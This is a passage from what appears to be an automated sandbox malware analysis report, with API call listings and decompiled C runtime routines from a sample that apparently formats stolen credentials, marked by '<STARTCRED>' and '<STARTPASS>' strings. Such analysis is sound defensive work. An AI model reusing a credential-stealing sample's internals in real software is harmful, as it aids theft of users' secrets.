    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
      • Part of subcall function 10081DF0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10081E04
      • Part of subcall function 10081DF0: CloseHandle.KERNEL32(00000000), ref: 10081E22
      • Part of subcall function 10081DF0: GetFileSize.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,100018BC), ref: 10081E2D
      • Part of subcall function 10081DF0: CreateFileMappingA.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 10081E40
      • Part of subcall function 10081DF0: MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,100018BC), ref: 10081E55
      • Part of subcall function 10081DF0: CloseHandle.KERNEL32(00000000), ref: 10081E64
      • Part of subcall function 10081DF0: CloseHandle.KERNEL32(00000000), ref: 10081E67
      • Part of subcall function 10082290: lstrlenA.KERNEL32(?,?,?,?,"hostname":","hostname":",?), ref: 100822BA
      • Part of subcall function 10082290: lstrlenA.KERNEL32(?,?,?,"hostname":","hostname":",?), ref: 100822D9
      • Part of subcall function 10082290: lstrlenA.KERNEL32(?,?,?,"hostname":","hostname":",?), ref: 100822E4
      • Part of subcall function 10082290: HeapAlloc.KERNEL32(00000008,?,?,?,?,?,"hostname":","hostname":",?), ref: 10082326
      • Part of subcall function 10082290: lstrlenA.KERNEL32(?,?,?,?,?,"hostname":","hostname":",?), ref: 10082339
      • Part of subcall function 10082290: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10082393
    • lstrlenA.KERNEL32(00000000), ref: 10001908
    • lstrlenA.KERNEL32(00000000), ref: 1000192F
    • lstrlenA.KERNEL32(00000000), ref: 10001956
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A61
      • Part of subcall function 10001700: lstrlenA.KERNEL32 ref: 10001725
      • Part of subcall function 10001700: HeapAlloc.KERNEL32(00000008,?), ref: 1000176D
    • HeapFree.KERNEL32(00000000,?), ref: 100019B7
    • HeapFree.KERNEL32(00000000,?), ref: 100019C4
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A1E
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTCRED>,00000000,00000000,00000000,?), ref: 10001021
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTPASS>,00000000), ref: 1000104D
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<ENDCRED>,00000000), ref: 10001075
      • Part of subcall function 10001000: lstrlenW.KERNEL32(10094C54), ref: 10001093
    • HeapFree.KERNEL32(00000000,00000000), ref: 100019EA
    • HeapFree.KERNEL32(00000000,00000000), ref: 100019F8
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A03
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A11
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A2E
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A40
    • HeapFree.KERNEL32(00000000,?), ref: 10001A52
    • UnmapViewOfFile.KERNEL32(?), ref: 10001A93
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
      • Part of subcall function 10002C20: __alldiv.INT64 ref: 10002C67
      • Part of subcall function 10002D40: __allrem.INT64 ref: 10002D6A
    • __alldiv.INT64 ref: 10003E49
    • __alldiv.INT64 ref: 10003E73
    • __allrem.INT64 ref: 10003E7E
    • __alldiv.INT64 ref: 10003F23
    • __alldiv.INT64 ref: 10003F5E
    • __allrem.INT64 ref: 10003F69
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • GetCPInfo.KERNEL32(003AA4C0,003AA4C0,?,7FFFFFFF,?,?,1008BB85,003AA4C0,003AA4C0,?,003AA4C0,?,?,?,?,003AA4C0), ref: 1008B958
    • MultiByteToWideChar.KERNEL32(003AA4C0,00000009,003AA4C0,003AA4C0,00000000,00000000,?,1008BB85,003AA4C0,003AA4C0,?,003AA4C0,?,?,?,?), ref: 1008B9DB
    • MultiByteToWideChar.KERNEL32(003AA4C0,00000001,003AA4C0,003AA4C0,00000000,1008BB85,?,1008BB85,003AA4C0,003AA4C0,?,003AA4C0,?,?,?,?), ref: 1008BA6E
    • MultiByteToWideChar.KERNEL32(003AA4C0,00000009,003AA4C0,003AA4C0,00000000,00000000,?,1008BB85,003AA4C0,003AA4C0,?,003AA4C0,?,?,?,?), ref: 1008BA85
      • Part of subcall function 10086449: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,10088306,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1008647B
    • MultiByteToWideChar.KERNEL32(003AA4C0,00000001,003AA4C0,003AA4C0,00000000,003AA4C0,?,1008BB85,003AA4C0,003AA4C0,?,003AA4C0,?,?,?,?), ref: 1008BB01
      • Part of subcall function 10086E33: CompareStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 10086E90
    • __freea.LIBCMT ref: 1008BB2C
    • __freea.LIBCMT ref: 1008BB38
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 75%
    			// Added note (editor's annotation, not decompiler output): CRT-style text-mode console writer.
    			// _v8 = *0x1347004 ^ esp is the MSVC /GS stack cookie and the E01333E82 call on return is the cookie check
    			// (its IsProcessorFeaturePresent(0x17) subcall is the __fastfail availability probe). The loop converts each
    			// source character to a wide char (E0133BF43), re-encodes it for GetConsoleCP() with WideCharToMultiByte,
    			// writes it with WriteFile, and for a source LF (0x0a) issues a second one-byte WriteFile carrying CR (0x0d);
    			// any WriteFile failure stores GetLastError() in the result struct at _a4.
    			E0133C1A7(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
    				signed int _v8;
    				signed char _v15;
    				char _v16;
    				void _v24;
    				short _v28;
    				char _v31;
    				void _v32;
    				long _v36;
    				intOrPtr _v40;
    				void* _v44;
    				signed int _v48;
    				signed char* _v52;
    				long _v56;
    				int _v60;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t78;
    				signed int _t80;
    				int _t86;
    				void* _t94;
    				long _t97;
    				void _t105;
    				void* _t112;
    				signed int _t115;
    				signed int _t117;
    				signed char _t122;
    				signed char _t127;
    				intOrPtr _t128;
    				signed int _t130;
    				signed char* _t131;
    				intOrPtr* _t132;
    				signed int _t133;
    				void* _t134;
    
    				_t78 =  *0x1347004; // 0x262637d3
    				_v8 = _t78 ^ _t133;
    				_t80 = _a8;
    				_t117 = _t80 >> 6;
    				_t115 = (_t80 & 0x0000003f) * 0x30;
    				_t131 = _a12;
    				_v52 = _t131;
    				_v48 = _t117;
    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1347f00 + _t117 * 4)) + _t115 + 0x18));
    				_v40 = _a16 + _t131;
    				_t86 = GetConsoleCP();
    				_t132 = _a4;
    				_v60 = _t86;
    				 *_t132 = 0;
    				 *((intOrPtr*)(_t132 + 4)) = 0;
    				 *((intOrPtr*)(_t132 + 8)) = 0;
    				while(_t131 < _v40) {
    					_v28 = 0;
    					_v31 =  *_t131;
    					_t128 =  *((intOrPtr*)(0x1347f00 + _v48 * 4));
    					_t122 =  *(_t128 + _t115 + 0x2d);
    					if((_t122 & 0x00000004) == 0) {
    						if(( *(E0133AD91(_t115, _t128) + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
    							_push(1);
    							_push(_t131);
    							goto L8;
    						} else {
    							if(_t131 >= _v40) {
    								_t130 = _v48;
    								 *((char*)( *((intOrPtr*)(0x1347f00 + _t130 * 4)) + _t115 + 0x2e)) =  *_t131;
    								 *( *((intOrPtr*)(0x1347f00 + _t130 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x1347f00 + _t130 * 4)) + _t115 + 0x2d) | 0x00000004;
    								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
    							} else {
    								_t112 = E0133BF43( &_v28, _t131, 2);
    								_t134 = _t134 + 0xc;
    								if(_t112 != 0xffffffff) {
    									_t131 =  &(_t131[1]);
    									goto L9;
    								}
    							}
    						}
    					} else {
    						_t127 = _t122 & 0x000000fb;
    						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
    						_push(2);
    						_v15 = _t127;
    						 *(_t128 + _t115 + 0x2d) = _t127;
    						_push( &_v16);
    						L8:
    						_push( &_v28);
    						_t94 = E0133BF43();
    						_t134 = _t134 + 0xc;
    						if(_t94 != 0xffffffff) {
    							L9:
    							_t131 =  &(_t131[1]);
    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
    							_v56 = _t97;
    							if(_t97 != 0) {
    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
    									L19:
    									 *_t132 = GetLastError();
    								} else {
    									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
    									if(_v36 >= _v56) {
    										if(_v31 != 0xa) {
    											goto L16;
    										} else {
    											_t105 = 0xd;
    											_v32 = _t105;
    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
    												goto L19;
    											} else {
    												if(_v36 >= 1) {
    													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
    													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
    													goto L16;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					goto L20;
    					L16:
    				}
    				L20:
    				return E01333E82(_t115, _v8 ^ _t133, _t131, _t132);
    			}

    APIs
    • GetConsoleCP.KERNEL32 ref: 0133C1E9
    • __Stoull.NTSTC_LIBCMT ref: 0133C264
    • __Stoull.NTSTC_LIBCMT ref: 0133C27F
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0133C2A5
    • WriteFile.KERNEL32(?,?,00000000,0133C91C,00000000), ref: 0133C2C4
    • WriteFile.KERNEL32(?,?,00000001,0133C91C,00000000), ref: 0133C2FD
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0133C91C,?,00000000,?,00000000,00000000), ref: 0133C33F
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • GetConsoleCP.KERNEL32 ref: 1008BD13
    • __Stoull.NTSTC_LIBCMT ref: 1008BD8E
    • __Stoull.NTSTC_LIBCMT ref: 1008BDA9
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 1008BDCF
    • WriteFile.KERNEL32(?,?,00000000,1008C446,00000000), ref: 1008BDEE
    • WriteFile.KERNEL32(?,?,00000001,1008C446,00000000), ref: 1008BE27
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,1008C446,?,00000000,?,00000000,00000000), ref: 1008BE69
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • lstrlenW.KERNEL32(<STARTCRED>,00000000,00000000,00000000,?), ref: 10001021
      • Part of subcall function 10081EB0: HeapReAlloc.KERNEL32(00000008,?,00000032,00000000,771CBFF8,?,?,10001039,<STARTCRED>,00000000,00000000), ref: 10081EDC
      • Part of subcall function 10081EB0: HeapAlloc.KERNEL32(00000008,00000032,00000000,771CBFF8,?,?,10001039,<STARTCRED>,00000000,00000000), ref: 10081EEC
      • Part of subcall function 10082110: lstrlenA.KERNEL32(10001048,10001048,00000000), ref: 10082121
      • Part of subcall function 10082110: HeapAlloc.KERNEL32(00000008,?,00000000,771CBFF8,?), ref: 10082140
      • Part of subcall function 10082110: HeapFree.KERNEL32(00000000,00000000), ref: 1008217D
    • lstrlenW.KERNEL32(<STARTPASS>,00000000), ref: 1000104D
    • lstrlenW.KERNEL32(<ENDCRED>,00000000), ref: 10001075
    • lstrlenW.KERNEL32(10094C54), ref: 10001093
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • __allrem.INT64 ref: 10084AD5
    • __alldiv.INT64 ref: 10084AF1
    • __allrem.INT64 ref: 10084B08
    • __alldiv.INT64 ref: 10084B26
    • __allrem.INT64 ref: 10084B3D
    • __alldiv.INT64 ref: 10084B5B
      • Part of subcall function 10086756: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10086758
      • Part of subcall function 10086756: GetCurrentProcess.KERNEL32(C0000417,10089AEE,1009E658,0000002C,100864A7,00000016,10086C36,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 1008677A
      • Part of subcall function 10086756: TerminateProcess.KERNEL32(00000000,?,1008215D,00000000,00000000,?,00000000,00000000,?), ref: 10086781
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01337F8F,00000003,?,01337F2F,00000003,01345DD0,0000000C,01338086,00000003,00000002), ref: 01337FFE
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,01337F8F,00000003,?,01337F2F,00000003,01345DD0,0000000C,01338086,00000003,00000002), ref: 01338011
    • FreeLibrary.KERNEL32(00000000,?,?,?,01337F8F,00000003,?,01337F2F,00000003,01345DD0,0000000C,01338086,00000003,00000002,00000000), ref: 01338034
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,1008578C,00000000,?,1008572C,00000000,1009E490,0000000C,10085874,00000000,00000002), ref: 100857FB
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,1008578C,00000000,?,1008572C,00000000,1009E490,0000000C,10085874,00000000,00000002), ref: 1008580E
    • FreeLibrary.KERNEL32(00000000,?,?,?,1008578C,00000000,?,1008572C,00000000,1009E490,0000000C,10085874,00000000,00000002), ref: 10085831
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 96%
    			E01337040(void* __edx, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v16;
    				int _v20;
    				int _v24;
    				char* _v28;
    				int _v32;
    				char _v36;
    				intOrPtr _v44;
    				char _v48;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t59;
    				char* _t61;
    				intOrPtr _t63;
    				int _t64;
    				intOrPtr* _t65;
    				signed int _t68;
    				intOrPtr* _t71;
    				short* _t73;
    				int _t74;
    				int _t76;
    				char _t78;
    				short* _t83;
    				short _t85;
    				int _t90;
    				char* _t96;
    				int _t101;
    				char* _t103;
    				void* _t104;
    				intOrPtr _t106;
    				intOrPtr _t107;
    				int _t108;
    				short* _t110;
    				int _t111;
    				signed int _t112;
    
    				_t104 = __edx;
    				_t59 =  *0x1347004; // 0x262637d3
    				_v8 = _t59 ^ _t112;
    				_t61 = _a4;
    				_t90 = _a12;
    				_t111 = 0;
    				_v28 = _t61;
    				_v20 = 0;
    				_t110 = _a8;
    				_v24 = _t110;
    				if(_t61 == 0 || _t90 != 0) {
    					if(_t110 != 0) {
    						E01336FBD(_t90,  &_v48, _t104, _a16);
    						_t96 = _v28;
    						if(_t96 == 0) {
    							_t63 = _v44;
    							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
    								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t110, 0xffffffff, _t111, _t111, _t111,  &_v20);
    								if(_t64 == 0 || _v20 != _t111) {
    									L55:
    									_t65 = E013389A5();
    									_t110 = _t110 | 0xffffffff;
    									 *_t65 = 0x2a;
    									goto L56;
    								} else {
    									_t53 = _t64 - 1; // -1
    									_t110 = _t53;
    									L56:
    									if(_v36 != 0) {
    										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
    									}
    									goto L59;
    								}
    							}
    							_t68 =  *_t110 & 0x0000ffff;
    							if(_t68 == 0) {
    								L51:
    								_t110 = _t111;
    								goto L56;
    							}
    							while(_t68 <= 0xff) {
    								_t110 =  &(_t110[1]);
    								_t111 = _t111 + 1;
    								_t68 =  *_t110 & 0x0000ffff;
    								if(_t68 != 0) {
    									continue;
    								}
    								goto L51;
    							}
    							goto L55;
    						}
    						_t106 = _v44;
    						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
    							if( *((intOrPtr*)(_t106 + 4)) != 1) {
    								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t110, 0xffffffff, _t96, _t90, _t111,  &_v20);
    								if(_t110 == 0) {
    									if(_v20 != _t111 || GetLastError() != 0x7a) {
    										L45:
    										_t71 = E013389A5();
    										_t111 = _t111 | 0xffffffff;
    										 *_t71 = 0x2a;
    										goto L51;
    									} else {
    										if(_t90 == 0) {
    											goto L56;
    										}
    										_t73 = _v24;
    										while(1) {
    											_t107 = _v44;
    											_t101 =  *(_t107 + 4);
    											if(_t101 > 5) {
    												_t101 = 5;
    											}
    											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t101, _t111,  &_v20);
    											_t90 = _a12;
    											_t108 = _t74;
    											if(_t108 == 0 || _v20 != _t111 || _t108 < 0 || _t108 > 5) {
    												goto L55;
    											}
    											if(_t110 + _t108 > _t90) {
    												goto L56;
    											}
    											_t76 = _t111;
    											_v32 = _t76;
    											if(_t108 <= 0) {
    												L43:
    												_t73 = _v24 + 2;
    												_v24 = _t73;
    												if(_t110 < _t90) {
    													continue;
    												}
    												goto L56;
    											}
    											_t103 = _v28;
    											while(1) {
    												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
    												 *((char*)(_t103 + _t110)) = _t78;
    												if(_t78 == 0) {
    													goto L56;
    												}
    												_t76 = _v32 + 1;
    												_t110 =  &(_t110[0]);
    												_v32 = _t76;
    												if(_t76 < _t108) {
    													continue;
    												}
    												goto L43;
    											}
    											goto L56;
    										}
    										goto L55;
    									}
    								}
    								if(_v20 != _t111) {
    									goto L45;
    								}
    								_t28 = _t110 - 1; // -1
    								_t111 = _t28;
    								goto L51;
    							}
    							if(_t90 == 0) {
    								L21:
    								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t110, _t90, _t96, _t90, _t111,  &_v20);
    								if(_t111 == 0 || _v20 != 0) {
    									goto L45;
    								} else {
    									if(_v28[_t111 - 1] == 0) {
    										_t111 = _t111 - 1;
    									}
    									goto L51;
    								}
    							}
    							_t83 = _t110;
    							_v24 = _t90;
    							while( *_t83 != _t111) {
    								_t83 =  &(_t83[1]);
    								_t16 =  &_v24;
    								 *_t16 = _v24 - 1;
    								if( *_t16 != 0) {
    									continue;
    								}
    								break;
    							}
    							if(_v24 != _t111 &&  *_t83 == _t111) {
    								_t90 = (_t83 - _t110 >> 1) + 1;
    							}
    							goto L21;
    						}
    						if(_t90 == 0) {
    							goto L51;
    						}
    						while( *_t110 <= 0xff) {
    							_t96[_t111] =  *_t110;
    							_t85 =  *_t110;
    							_t110 =  &(_t110[1]);
    							if(_t85 == 0) {
    								goto L51;
    							}
    							_t111 = _t111 + 1;
    							if(_t111 < _t90) {
    								continue;
    							}
    							goto L51;
    						}
    						goto L45;
    					}
    					 *((intOrPtr*)(E013389A5())) = 0x16;
    					E013374A5();
    					goto L59;
    				} else {
    					L59:
    					return E01333E82(_t90, _v8 ^ _t112, _t110, _t111);
    				}
    			}

    APIs
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 01337124
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 01337160
    • GetLastError.KERNEL32(?,?,00000000,00000000,?,00000000,?,013338A4,00000000,?,?,00000000,00000000,?), ref: 01337186
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000001,00000000,?,?,?,00000000,00000000,?,00000000,?,013338A4), ref: 013371BF
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0133727C
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • lstrlenA.KERNEL32(?,?,?,?,"hostname":","hostname":",?), ref: 100822BA
    • lstrlenA.KERNEL32(?,?,?,"hostname":","hostname":",?), ref: 100822D9
    • lstrlenA.KERNEL32(?,?,?,"hostname":","hostname":",?), ref: 100822E4
    • HeapAlloc.KERNEL32(00000008,?,?,?,?,?,"hostname":","hostname":",?), ref: 10082326
    • lstrlenA.KERNEL32(?,?,?,?,?,"hostname":","hostname":",?), ref: 10082339
    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10082393
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 66%
    			E0133585E(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
    				intOrPtr _v0;
    				char _v8;
    				char _v12;
    				intOrPtr* _v16;
    				intOrPtr* _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr* _v32;
    				intOrPtr* _v60;
    				void* __ebx;
    				void* __ecx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				intOrPtr _t70;
    				void* _t71;
    				intOrPtr* _t74;
    				intOrPtr* _t78;
    				intOrPtr* _t82;
    				intOrPtr* _t83;
    				intOrPtr _t84;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				intOrPtr* _t89;
    				signed int _t93;
    				void* _t97;
    				intOrPtr _t98;
    				void* _t100;
    				char _t101;
    				void* _t105;
    				intOrPtr _t111;
    				char _t114;
    				intOrPtr _t116;
    				intOrPtr* _t119;
    				intOrPtr* _t121;
    				intOrPtr* _t123;
    				intOrPtr _t129;
    				void* _t130;
    				intOrPtr* _t131;
    				void* _t132;
    				signed int* _t136;
    				void* _t138;
    				void* _t140;
    				void* _t141;
    				void* _t142;
    
    				_t113 = __edx;
    				_push(_t105);
    				_push(_t105);
    				_t119 = _a4;
    				_t143 =  *_t119 - 0x80000003;
    				if( *_t119 == 0x80000003) {
    					L18:
    					return _t70;
    				} else {
    					_t71 = E01336392(_t97, _t105, __edx, _t119, _t130, _t143, _t130, _t97);
    					_t98 = _a20;
    					_t144 =  *((intOrPtr*)(_t71 + 8));
    					if( *((intOrPtr*)(_t71 + 8)) == 0) {
    						L6:
    						if( *((intOrPtr*)(_t98 + 0xc)) == 0) {
    							E0133876E(_t98, _t105, _t113, _t119, _t130, __eflags);
    							asm("int3");
    							_t138 = _t140;
    							_t141 = _t140 - 0x18;
    							_push(_t98);
    							_push(_t130);
    							_t131 = _v16;
    							_push(_t119);
    							__eflags = _t131;
    							if(__eflags == 0) {
    								E0133876E(_t98, _t105, _t113, _t119, _t131, __eflags);
    								asm("int3");
    								_push(_t138);
    								_push(_t98);
    								_push(_t131);
    								_push(_t119);
    								_t121 = _v60;
    								_t132 = 0;
    								__eflags =  *_t121;
    								if( *_t121 <= 0) {
    									L37:
    									_t74 = 0;
    									__eflags = 0;
    								} else {
    									_t100 = 0;
    									while(1) {
    										_t78 = E013361BE( *((intOrPtr*)(_t100 +  *((intOrPtr*)(_t121 + 4)) + 4)) + 4, 0x134785c);
    										__eflags = _t78;
    										if(_t78 == 0) {
    											break;
    										}
    										_t132 = _t132 + 1;
    										_t100 = _t100 + 0x10;
    										__eflags = _t132 -  *_t121;
    										if(_t132 <  *_t121) {
    											continue;
    										} else {
    											goto L37;
    										}
    										goto L38;
    									}
    									_t74 = 1;
    								}
    								L38:
    								return _t74;
    							} else {
    								_t123 =  *_t131;
    								_t101 = 0;
    								__eflags = _t123;
    								if(_t123 > 0) {
    									_t114 = 0;
    									_v12 = 0;
